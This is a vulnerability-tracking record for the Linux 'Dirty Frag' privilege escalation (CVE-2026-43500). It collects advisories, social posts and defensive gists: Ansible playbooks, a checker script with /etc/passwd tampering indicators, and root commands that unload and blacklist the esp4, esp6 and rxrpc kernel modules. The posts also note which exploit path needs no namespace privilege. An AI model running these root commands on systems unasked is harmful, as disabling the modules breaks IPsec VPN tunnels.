{"vulnerability": "CVE-2026-43500", "sightings": [{"uuid": "533fe2b4-62e9-430e-9452-e90234fd4c2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://ccb.belgium.be/advisories/warning-dirty-frag-new-linux-local-privilege-escalation-vulnerability-was-disclosed", "content": "", "creation_timestamp": "2026-05-08T09:28:10.000000Z"}, {"uuid": "bfd0d374-3aa3-4935-80be-2ddde695c65d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116539044705700152", "content": "And just to clarify about \"Dirty Frag\" vs. \"Copy Fail 2\":\nDirty Frag is TWO vulnerabilities:\n\nThe xfrm-ESP Page-Cache Write vulnerability has been assigned CVE-2026-43284 and patched in mainline at f4c50a4034e6.\nThe RxRPC Page-Cache Write vulnerability has been reserved as CVE-2026-43500 for tracking; no patch exists in any tree yet.\nCopy Fail 2 is a \"clean room\" rediscovery/exploitation of f4c50a4034e6\nSince Copy Fail 2 was published to GitHub 1 hour earlier than Dirty Frag was published.  The Dirty Frag writeup specifies that the embargo was broken, and as a result TWO vulnerabilities were disclosed.\nPersonally, I think that if you publish a patch for a vulnerability, and then you begin an embargo a week after it was published, that doesn't really count as an \"embargo\"?  
\ud83e\udd37\u200d\u2642\ufe0f\nFun stuff...", "creation_timestamp": "2026-05-08T12:51:43.777812Z"}, {"uuid": "36d81f94-7a34-4c6b-9809-5df29947a53d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/kisai.me/post/3mldtc4wrns2a", "content": "Found it\n\nCVE-2026-43284\nCVE-2026-43500\n\nMaybe this is it", "creation_timestamp": "2026-05-08T13:24:15.860547Z"}, {"uuid": "ed2d0960-bc6e-4ab2-9d25-0e3e9915e68a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/drgoon.bsky.social/post/3mldtdraztc2n", "content": "\"CVE-2026-43284 is now assigned.\n\nThat was for the first issue, and that is now fixed in the latest round of stable kernel updates.  The second has CVE-2026-43500 reserved for it if you need to track this, and is not fixed in any released kernel version yet.\"", "creation_timestamp": "2026-05-08T13:25:11.509789Z"}, {"uuid": "a89a0c0a-76af-4b13-a9ad-f64ad5a1bd49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/bykvaadm/7bb8937ebc4f0485fea26fa27af4c522", "content": "- name: Mitigate DirtyFrag (CVE-2026-43284 / CVE-2026-43500)\n    hosts: all\n    become: true\n    tasks:\n      - name: Caveats\n        debug:\n          msg: |\n            WARNING:\n            - esp4/esp6: if an IPsec VPN (strongSwan, Libreswan, etc.) is in use,
\n              disabling them will break the tunnels. In that case, wait for the kernel patch.\n            - rxrpc: used only for AFS/Kerberos; in most infrastructures\n              it is safe to disable.\n            - CVE-2026-43500 (rxrpc) is not patched yet; blocking the module\n              is the only protection until a kernel patch is released.\n            - After DirtyFrag exploitation the page cache is polluted; a\n              drop cache or reboot is required.\n\n      - name: Blacklist vulnerable modules\n        copy:\n          dest: /etc/modprobe.d/dirtyfrag-mitigation.conf\n          content: |\n            install esp4 /bin/false\n            install esp6 /bin/false\n            install rxrpc /bin/false\n            blacklist esp4\n            blacklist esp6\n            blacklist rxrpc\n\n      - name: Unload modules if loaded\n        modprobe:\n          name: \"{{ item }}\"\n      
    state: absent\n        loop: [esp4, esp6, rxrpc]\n        failed_when: false\n        when: ansible_facts.get('virtualization_type') != 'container'\n\n      - name: Verify modules not loaded\n        shell: lsmod | grep -E '^(esp4|esp6|rxrpc)\\s'\n        register: check\n        failed_when: check.rc == 0\n        changed_when: false\n        when: ansible_facts.get('virtualization_type') != 'container'", "creation_timestamp": "2026-05-08T13:41:26.000000Z"}, {"uuid": "3abd5372-7d5a-4f97-9c43-b65ef4554dd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/m3nu/d85533bbf342edd3a9426711409a1b9a", "content": "", "creation_timestamp": "2026-05-08T13:45:53.000000Z"}, {"uuid": "d8f0f8f3-863c-4d6f-a05b-b60e0ae9464e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116538375077982531", "content": "The two vulnerabilities that make up #DirtyFrag have received their CVE numbers:\n\ud83d\udd34 CVE-2026-43284 \u2014 xfrm-ESP Page-Cache Write (patched in mainline: f4c50a4034e6)\ud83d\udfe1 CVE-2026-43500 \u2014 RxRPC Page-Cache Write\nIf you have not done so yet, the mitigation is still to blacklist esp4, esp6 and rxrpc.\ud83d\udc47 https://vulnerability.circl.lu/vuln/CVE-2026-43284", "creation_timestamp": "2026-05-08T10:01:24.008399Z"}, {"uuid": "bce47242-2594-45c6-a653-5a8370c5590c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/eyalestrin.bsky.social/post/3mleevhyme22p", "content": "\"Dirty Frag\" Linux Kernel LPE Zero-Day (CVE-2026-43284, 
CVE-2026-43500) #patchmanagement", "creation_timestamp": "2026-05-08T18:39:18.381389Z"}, {"uuid": "24ddea41-4324-4bf1-83ce-16394de8606b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/al26-011-vulnerabilities-affecting-linux-cve-2026-43284-cve-2026-43500", "content": "", "creation_timestamp": "2026-05-08T10:39:10.000000Z"}, {"uuid": "12cd2f25-dd57-45b7-88e0-63eafeef76d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://mstdn.social/users/jschauma/statuses/116540434561235145", "content": "#DirtyFrag status/advisories:\nAlmaLinux:\nhttps://almalinux.org/blog/2026-05-07-dirty-frag/\nDebian:\nhttps://security-tracker.debian.org/tracker/CVE-2026-43500\nhttps://security-tracker.debian.org/tracker/CVE-2026-43284\nGentoo:\nhttps://bugs.gentoo.org/974307\nRedHat:\nhttps://bugzilla.redhat.com/show_bug.cgi?id=CVE-2026-43284\nhttps://access.redhat.com/security/cve/cve-2026-43284\nnothing yet on CVE-2026-43500\nRocky:\nhttps://kb.ciq.com/article/rocky-linux/rl-dirty-frag-mitigation\nSUSE / OpenSUSE:\nhttps://www.suse.com/security/cve/CVE-2026-43500.html\nhttps://www.suse.com/security/cve/CVE-2026-43284.html\nhttps://www.suse.com/c/addressing-copy-fail2-aka-dirtyfrag-in-suse-virtualization/\nUbuntu:\nhttps://ubuntu.com/security/CVE-2026-43284\nhttps://ubuntu.com/security/CVE-2026-43500\nhttps://ubuntu.com/blog/dirty-frag-linux-vulnerability-fixes-available\nAWS:\nhttps://aws.amazon.com/security/security-bulletins/rss/2026-027-aws/\nhttps://explore.alas.aws.amazon.com/CVE-2026-43284.html", "creation_timestamp": "2026-05-08T18:45:22.128406Z"}, {"uuid": "8af3a688-5529-41d5-9f91-5db4188a8510", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/aoetk.bsky.social/post/3mldllohhqs2s", "content": "So yet another kernel vulnerability like this has turned up, huh\n\n/ Linux Kernel LPE (Local Privilege Escalation) vulnerability (Dirty Frag: CVE-2026-43284, CVE-2026-43500) security.sios.jp/vulnerabilit...", "creation_timestamp": "2026-05-08T11:06:30.206310Z"}, {"uuid": "24f4e679-d618-45ea-9ac6-e0ec664fe8dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/aoetk.fedibird.com.ap.brid.gy/post/3mldlq5pm74r2", "content": "So yet another kernel vulnerability like this has turned up, huh\n\n/ Linux Kernel LPE (Local Privilege Escalation) vulnerability (Dirty Frag: CVE-2026-43284, CVE-2026-43500) - SIOS SECURITY BLOG https://security.sios.jp/vulnerability/kernel-security-vulnerability-20260508/", "creation_timestamp": "2026-05-08T11:13:12.417376Z"}, {"uuid": "f5d79e82-0bd9-4bee-9882-e3d49f33352a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/jschauma.mstdn.social.ap.brid.gy/post/3mlefaalbezb2", "content": "#DirtyFrag status/advisories:\n\nAlmaLinux:\nhttps://almalinux.org/blog/2026-05-07-dirty-frag/\n\nDebian:\nhttps://security-tracker.debian.org/tracker/CVE-2026-43500\nhttps://security-tracker.debian.org/tracker/CVE-2026-43284\n\nGentoo:\nhttps://bugs.gentoo.org/974307\n\nRedHat [\u2026]", "creation_timestamp": "2026-05-08T18:46:05.118790Z"}, {"uuid": "d8fe8370-c3e9-460c-87f5-75982966e46b", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/xc78xsgzsd-droid/7bb632be2e3e341b4e8b4cc79deac739", "content": "#!/bin/sh\n# ============================================================\n# DirtyFrag Vulnerability Checker\n# CVE-2026-43284 (xfrm/ESP) + CVE-2026-43500 (rxrpc)\n# Disclosed: 2026-05-07 | No patch available yet\n# ============================================================\n\nRED='\\033[0;31m'; YEL='\\033[1;33m'; GRN='\\033[0;32m'\nBLD='\\033[1m'; RST='\\033[0m'\n\nok()   { printf \"${GRN}[OK]${RST}     %s\\n\" \"$1\"; }\nwarn() { printf \"${YEL}[WARN]${RST}   %s\\n\" \"$1\"; }\nvuln() { printf \"${RED}[VULN]${RST}   %s\\n\" \"$1\"; }\ninfo() { printf \"         %s\\n\" \"$1\"; }\n\necho\nprintf \"${BLD}=== DirtyFrag Vulnerability Check ===${RST}\\n\"\nprintf \"    CVE-2026-43284 (ESP/xfrm) + CVE-2026-43500 (rxrpc)\\n\"\nprintf \"    Kernel: %s\\n\\n\" \"$(uname -r)\"\n\nVULN_COUNT=0\n\n# \u2500\u2500 1. Mitigation already in place? \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[1] Modprobe blacklist (/etc/modprobe.d/dirtyfrag.conf)${RST}\\n\"\nif [ -f /etc/modprobe.d/dirtyfrag.conf ] || \\\n   grep -rq 'install esp4 /bin/false' /etc/modprobe.d/ 2>/dev/null; then\n    ok \"Blacklist found \u2013 modules blocked from loading\"\n    MITIGATED=1\nelse\n    warn \"No blacklist found\"\n    MITIGATED=0\nfi\necho\n\n# \u2500\u2500 2. Vulnerable modules currently loaded? 
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[2] Loaded kernel modules (esp4 / esp6 / rxrpc)${RST}\\n\"\nfor MOD in esp4 esp6 rxrpc; do\n    if lsmod 2>/dev/null | grep -q \"^${MOD} \"; then\n        vuln \"Module '${MOD}' is currently LOADED\"\n        VULN_COUNT=$((VULN_COUNT + 1))\n    else\n        ok \"Module '${MOD}' not loaded\"\n    fi\ndone\necho\n\n# \u2500\u2500 3. Modules available on disk? \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[3] Module files available on disk${RST}\\n\"\nKVER=$(uname -r)\nfor MOD in esp4 esp6 rxrpc; do\n    FOUND=$(find /lib/modules/${KVER} -name \"${MOD}.ko\" -o -name \"${MOD}.ko.xz\" \\\n                                     -o -name \"${MOD}.ko.zst\" 2>/dev/null | head -1)\n    if [ -n \"$FOUND\" ]; then\n        if [ \"$MITIGATED\" -eq 1 ]; then\n            warn \"Module '${MOD}' exists on disk (but loading is blocked)\"\n            info \"\u2192 $FOUND\"\n        else\n            vuln \"Module '${MOD}' exists and CAN be auto-loaded\"\n            info \"\u2192 $FOUND\"\n            VULN_COUNT=$((VULN_COUNT + 1))\n        fi\n    else\n        ok \"Module '${MOD}' not found on disk\"\n    fi\ndone\necho\n\n# \u2500\u2500 4. 
User namespace creation (xfrm/ESP exploit path) \u2500\u2500\u2500\u2500\nprintf \"${BLD}[4] Unprivileged user namespaces (CVE-2026-43284 path)${RST}\\n\"\nUSERNS=$(cat /proc/sys/user/max_user_namespaces 2>/dev/null)\nif [ \"$USERNS\" = \"0\" ]; then\n    ok \"user.max_user_namespaces = 0 (xfrm/ESP exploit path blocked)\"\nelse\n    USERNS=${USERNS:-\"unknown\"}\n    warn \"user.max_user_namespaces = ${USERNS} (ESP exploit path reachable)\"\n    info \"\u2192 Ubuntu: check AppArmor profile for namespace restriction\"\nfi\n\n# AppArmor namespace restriction (Ubuntu)\nif [ -f /sys/kernel/security/apparmor/profiles ]; then\n    if grep -q 'unprivileged_userns' /sys/kernel/security/apparmor/profiles 2>/dev/null || \\\n       [ -f /etc/apparmor.d/tunables/userns ]; then\n        ok \"AppArmor namespace restriction detected (Ubuntu-style mitigation)\"\n    fi\nfi\necho\n\n# \u2500\u2500 5. rxrpc-specific check \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[5] rxrpc path (CVE-2026-43500 \u2013 no namespace needed)${RST}\\n\"\nif lsmod 2>/dev/null | grep -q '^rxrpc '; then\n    vuln \"rxrpc is loaded \u2013 exploit path requires NO namespace privilege\"\n    VULN_COUNT=$((VULN_COUNT + 1))\nelif find /lib/modules/${KVER} -name 'rxrpc.ko*' 2>/dev/null | grep -q .; then\n    if [ \"$MITIGATED\" -eq 1 ]; then\n        ok \"rxrpc available but loading is blacklisted\"\n    else\n        vuln \"rxrpc module present and loadable (no namespace needed to exploit)\"\n        VULN_COUNT=$((VULN_COUNT + 1))\n    fi\nelse\n    ok \"rxrpc module not present on this system\"\nfi\necho\n\n# \u2500\u2500 6. 
Page cache integrity hint \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[6] Page cache integrity check (exploit IOC)${RST}\\n\"\nPASSWD_SIZE=$(stat -c%s /etc/passwd 2>/dev/null)\nSHADOW_SIZE=$(stat -c%s /etc/shadow 2>/dev/null)\nif [ -n \"$PASSWD_SIZE\" ] && [ \"$PASSWD_SIZE\" -lt 50 ]; then\n    vuln \"/etc/passwd suspiciously small (${PASSWD_SIZE} bytes) \u2013 possible tampering!\"\n    VULN_COUNT=$((VULN_COUNT + 1))\nelse\n    ok \"/etc/passwd size appears normal (${PASSWD_SIZE} bytes)\"\nfi\n\n# Check for unexpected root entries (new UID 0 lines)\nROOT_ENTRIES=$(grep -c ':0:' /etc/passwd 2>/dev/null)\nif [ \"$ROOT_ENTRIES\" -gt 2 ]; then\n    vuln \"Multiple UID-0 entries in /etc/passwd (${ROOT_ENTRIES}) \u2013 check for backdoor!\"\n    VULN_COUNT=$((VULN_COUNT + 1))\nelse\n    ok \"No unexpected UID-0 entries in /etc/passwd\"\nfi\necho\n\n# \u2500\u2500 Summary \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}=== Summary ===${RST}\\n\"\nKERNEL_YEAR=$(uname -r | grep -oE '^[0-9]+' )\nif [ \"$KERNEL_YEAR\" -ge 4 ] 2>/dev/null; then\n    info \"Kernel $(uname -r) is in the affected range (since Jan 2017)\"\nelse\n    info \"Kernel $(uname -r) \u2013 age unclear, manual review recommended\"\nfi\n\nif [ \"$MITIGATED\" -eq 1 ] && [ \"$VULN_COUNT\" -eq 0 ]; then\n    printf \"\\n${GRN}${BLD}[RESULT] Mitigation applied \u2013 system appears protected${RST}\\n\"\n    info \"\u2192 Revert /etc/modprobe.d/dirtyfrag.conf once a patched kernel is installed\"\nelif [ \"$VULN_COUNT\" -eq 0 ]; then\n    printf \"\\n${YEL}${BLD}[RESULT] No active modules loaded, but no 
blacklist in place${RST}\\n\"\n    info \"\u2192 Modules can still be auto-loaded. Apply mitigation to be safe.\"\nelse\n    printf \"\\n${RED}${BLD}[RESULT] SYSTEM LIKELY VULNERABLE (${VULN_COUNT} issue(s) found)${RST}\\n\"\n    info \"\u2192 Apply mitigation immediately (unless you use IPsec/kAFS):\"\n    printf \"\\n\"\n    printf '    sudo sh -c \"printf '\"'\"'install esp4 /bin/false\\ninstall esp6 /bin/false\\ninstall rxrpc /bin/false\\n'\"'\"' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true\"\\n'\n    printf \"\\n\"\n    info \"\u2192 Optionally drop page cache afterwards:\"\n    info \"  sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'\"\nfi\necho\n", "creation_timestamp": "2026-05-08T12:08:27.000000Z"}, {"uuid": "985f091e-6aa8-46a1-9953-75928b4e4f19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/unraid.net/post/3mlewtdz2522l", "content": "\ud83d\udea8 Unraid OS 7.2.6 is now available.   \n\nThis is an important security release that upgrades the Linux kernel to address the \"Dirty Frag\" local privilege escalation vulnerability (CVE-2026-43284 & CVE-2026-43500).  \n\nAll users should update their systems immediately to stay protected. 
\ud83d\udee1\ufe0f", "creation_timestamp": "2026-05-09T00:00:14.826813Z"}, {"uuid": "12482d55-7452-4c4c-aa2c-16a3ee93e8e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mleww3kwwc2e", "content": "2/11\n\nThis update addresses a Linux kernel local privilege escalation attack known\n  as \"Dirty Frag.\" Please note that there's a second CVE (CVE-2026-43500) that\n  is not yet patched upstream.\n  Mitigation: If for some reason it's not possible to upgrade the kernel right", "creation_timestamp": "2026-05-09T00:01:46.352735Z"}, {"uuid": "ba2ba09e-35ab-478b-9871-408239a00447", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mleww4snfr22", "content": "3/11\n\naway you may blacklist or remove the kernel modules esp4.ko and esp6.ko\n  (CVE-2026-43284) and rxrpc.ko (CVE-2026-43500).\n  Also remove the modules from the kernel if they have been loaded:\n    rmmod esp4 esp6 rxrpc\n  And, drop the file caches in case in-memory program copies", "creation_timestamp": "2026-05-09T00:01:47.498372Z"}, {"uuid": "41241fe2-fa4a-456e-a346-4cb8fa5f122d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mlewwcbh4i22", "content": "8/11\n\nas \"Dirty Frag.\" Please note that there's a second CVE (CVE-2026-43500) that\n  is not yet patched upstream.\n  Mitigation: If for some reason it's not possible to upgrade the kernel right\n  away you may blacklist or remove the kernel modules esp4.ko and esp6.ko", "creation_timestamp": "2026-05-09T00:01:53.070919Z"}, {"uuid": 
"6ca99d51-5ae7-448f-b7da-81f1b7934b05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mlewwdh2f62i", "content": "9/11\n\n(CVE-2026-43284) and rxrpc.ko (CVE-2026-43500).\n  Also remove the modules from the kernel if they have been loaded:\n    rmmod esp4 esp6 rxrpc\n  And, drop the file caches in case in-memory program copies have already\n  been compromised. Make sure possibly affected programs do not", "creation_timestamp": "2026-05-09T00:01:54.619433Z"}, {"uuid": "196ae2cb-5c94-4559-a32e-dd535a426e54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/unraid.net/post/3mleyipgro32d", "content": "\ud83d\udea8 Unraid OS 7.2.6 is now available.\n\nThis is an important security release that upgrades the Linux kernel to address the \"Dirty Frag\" local privilege escalation vulnerability (CVE-2026-43284 & CVE-2026-43500).  \n\nAll users should update their systems immediately to stay protected. 
\ud83d\udee1\ufe0f", "creation_timestamp": "2026-05-09T00:30:05.046715Z"}, {"uuid": "4c1c2a84-4c47-401c-86a2-5bbc00e3bf67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/Anarcat.kolektiva.social.ap.brid.gy/post/3mle3b6xlyga2", "content": "#Debian security team just released DSA-6253-1 which addresses #dirtyfrag local root escalation which has been issued CVE-2026-43284 and CVE-2026-43500", "creation_timestamp": "2026-05-08T15:50:40.576696Z"}, {"uuid": "912f06b3-01e7-422c-aa97-c9e8868fb824", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/sayem314/dd8d3932a2e91d6a8a454b9986f6087e", "content": "Dirty Frag is a Linux kernel local privilege escalation chain involving the IPsec ESP stack and RxRPC. If a vulnerable host runs untrusted local code, containers, CI jobs, app sandboxes, or shared shell users, treat it as urgent.\n\nThe real fix is a patched kernel from your distribution. 
Until Debian or Ubuntu ship fixed kernels for your release, the mitigation below blocks the affected modules:\n\n- `esp4`\n- `esp6`\n- `rxrpc`\n\nSources:\n\n- https://github.com/V4bel/dirtyfrag\n- https://dirtyfrag.io/\n- https://openwall.com/lists/oss-security/2026/05/07/10\n\n## What this disables\n\nThis mitigation disables kernel IPsec ESP and RxRPC.\n\nLikely unaffected:\n\n- HTTPS/TLS\n- SSH\n- Docker bridge networking\n- WireGuard\n- Tailscale\n- OpenVPN\n- normal web apps and APIs\n\nLikely affected:\n\n- strongSwan/libreswan IPsec tunnels using ESP\n- software depending on RxRPC or AFS\n\nCheck before applying on VPN gateways:\n\n```bash\nip xfrm state\nsystemctl list-units --type=service --all 'strongswan*' 'ipsec*' 'libreswan*' 'openafs*' 'afsd*'\nps -eo comm,args | grep -E 'strongswan|charon|pluto|ipsec|openafs|afsd|rxrpc' | grep -v grep || true\n```\n\n## Quick check\n\n```bash\nuname -r\ngrep -E '^(esp4|esp6|rxrpc) ' /proc/modules || echo \"esp4, esp6, rxrpc are not currently loaded\"\nmodprobe -n -v esp4 2>/dev/null || true\nmodprobe -n -v esp6 2>/dev/null || true\nmodprobe -n -v rxrpc 2>/dev/null || true\n```\n\nIf one of these features is built directly into your kernel instead of available as a module, a modprobe blacklist cannot disable it. 
In that case, prioritize a fixed kernel and reboot.\n\n## Manual mitigation\n\n```bash\nsudo tee /etc/modprobe.d/disable-dirtyfrag.conf >/dev/null <<'EOF'\ninstall esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\nEOF\n\nsudo modprobe -r esp4 esp6 rxrpc 2>/dev/null || true\nsync\necho 3 | sudo tee /proc/sys/vm/drop_caches >/dev/null\n```\n\nVerify:\n\n```bash\nif grep -E '^(esp4|esp6|rxrpc) ' /proc/modules; then\n  echo \"STILL LOADED: reboot or investigate module users\"\nelse\n  echo \"Dirty Frag modules are not loaded\"\nfi\n\nfor module in esp4 esp6 rxrpc; do\n  echo \"== $module ==\"\n  modprobe -n -v \"$module\" 2>/dev/null || true\ndone\n```\n\nExpected `modprobe -n -v` output should include:\n\n```text\ninstall /bin/false\n```\n\n## Patch when your distro ships a kernel fix\n\nKeep normal security updates moving. The module block is a mitigation, not the final repair.\n\n```bash\nsudo apt update\nsudo apt full-upgrade\nsudo reboot\n```\n\nAfter reboot:\n\n```bash\nuname -r\ngrep -E '^(esp4|esp6|rxrpc) ' /proc/modules || true\n```\n\n## Ansible playbook\n\nSave as `dirtyfrag-mitigate.yml`:\n\n```yaml\n---\n- name: Mitigate Dirty Frag CVE-2026-43284 and CVE-2026-43500\n  hosts: all\n  become: true\n  gather_facts: false\n\n  vars:\n    dirtyfrag_modules:\n      - esp4\n      - esp6\n      - rxrpc\n\n  tasks:\n    - name: Check active IPsec xfrm state\n      ansible.builtin.command: ip xfrm state\n      register: dirtyfrag_xfrm_state\n      changed_when: false\n      failed_when: false\n\n    - name: Show active IPsec xfrm state warning\n      ansible.builtin.debug:\n        msg: \"Active xfrm state detected. 
Confirm this host is not an IPsec gateway before disabling esp4/esp6.\"\n      when: dirtyfrag_xfrm_state.stdout | trim | length > 0\n\n    - name: Block Dirty Frag kernel modules from loading\n      ansible.builtin.copy:\n        dest: /etc/modprobe.d/disable-dirtyfrag.conf\n        owner: root\n        group: root\n        mode: \"0644\"\n        content: |\n          {% for module in dirtyfrag_modules %}\n          install {{ module }} /bin/false\n          {% endfor %}\n      register: dirtyfrag_blacklist\n\n    - name: Unload Dirty Frag modules if currently loaded\n      community.general.modprobe:\n        name: \"{{ item }}\"\n        state: absent\n      loop: \"{{ dirtyfrag_modules }}\"\n      register: dirtyfrag_unload\n      failed_when: false\n\n    - name: Flush filesystem buffers before clearing page cache\n      ansible.builtin.command: sync\n      changed_when: false\n      when: dirtyfrag_blacklist.changed or dirtyfrag_unload.changed\n\n    - name: Clear page cache after mitigation changes\n      ansible.builtin.command: sysctl -w vm.drop_caches=3\n      changed_when: true\n      when: dirtyfrag_blacklist.changed or dirtyfrag_unload.changed\n\n    - name: Check whether Dirty Frag modules are still loaded\n      ansible.builtin.shell: \"grep -E '^(esp4|esp6|rxrpc) ' /proc/modules\"\n      register: dirtyfrag_loaded\n      changed_when: false\n      failed_when: false\n\n    - name: Verify modprobe resolves modules to /bin/false\n      ansible.builtin.command: \"modprobe -n -v {{ item }}\"\n      loop: \"{{ dirtyfrag_modules }}\"\n      register: dirtyfrag_modprobe_check\n      changed_when: false\n      failed_when: false\n\n    - name: Show mitigation status\n      ansible.builtin.debug:\n        msg:\n          - \"config_changed={{ dirtyfrag_blacklist.changed }}\"\n          - \"loaded_modules={{ dirtyfrag_loaded.stdout | default('') }}\"\n          - \"modprobe_checks={{ dirtyfrag_modprobe_check.results | map(attribute='stdout') | list 
}}\"\n\n    - name: Fail if Dirty Frag modules are still loaded\n      ansible.builtin.fail:\n        msg: \"One or more Dirty Frag modules are still loaded. Reboot this host or inspect module users.\"\n      when: dirtyfrag_loaded.rc == 0\n```\n\nExample `inventory.yml`:\n\n```yaml\n---\nall:\n  children:\n    webservers:\n      hosts:\n        web-1:\n          ansible_host: 203.0.113.10\n          ansible_user: ubuntu\n        web-2:\n          ansible_host: 203.0.113.11\n          ansible_user: ubuntu\n    workers:\n      hosts:\n        worker-1:\n          ansible_host: 203.0.113.20\n          ansible_user: debian\n  vars:\n    ansible_become: true\n    ansible_python_interpreter: /usr/bin/python3\n```\n\nRun it:\n\n```bash\nansible-playbook -i inventory.yml dirtyfrag-mitigate.yml\n```\n\nRun only a selected group:\n\n```bash\nansible-playbook -i inventory.yml dirtyfrag-mitigate.yml --limit webservers\n```\n\n## Ansible role-style task\n\nIf you already have a common hardening role, put the modules in group vars:\n\n```yaml\ndisabled_kernel_modules:\n  - esp4\n  - esp6\n  - rxrpc\n```\n\nThen use this task 